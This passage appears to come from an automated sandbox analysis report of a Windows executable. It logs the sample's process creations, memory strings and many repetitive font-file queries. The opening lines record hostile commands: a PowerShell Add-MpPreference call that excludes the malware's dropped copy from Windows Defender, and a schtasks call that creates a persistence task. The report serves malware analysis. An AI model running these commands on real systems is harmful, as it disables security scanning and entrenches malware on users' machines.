                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exeJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmpJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exeJump to behavior
                      Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmpBinary or memory string: Program Manager
                      Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmpBinary or memory string: Program Manager"
                      Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: g94e4BgSRN.exe, 00000009.00000002.518583968.0000000001EE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: g94e4BgSRN.exe, 00000009.00000002.518148193.00000000010F5000.00000004.00000001.sdmpBinary or memory string: @Program Manager
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Users\user\Desktop\g94e4BgSRN.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
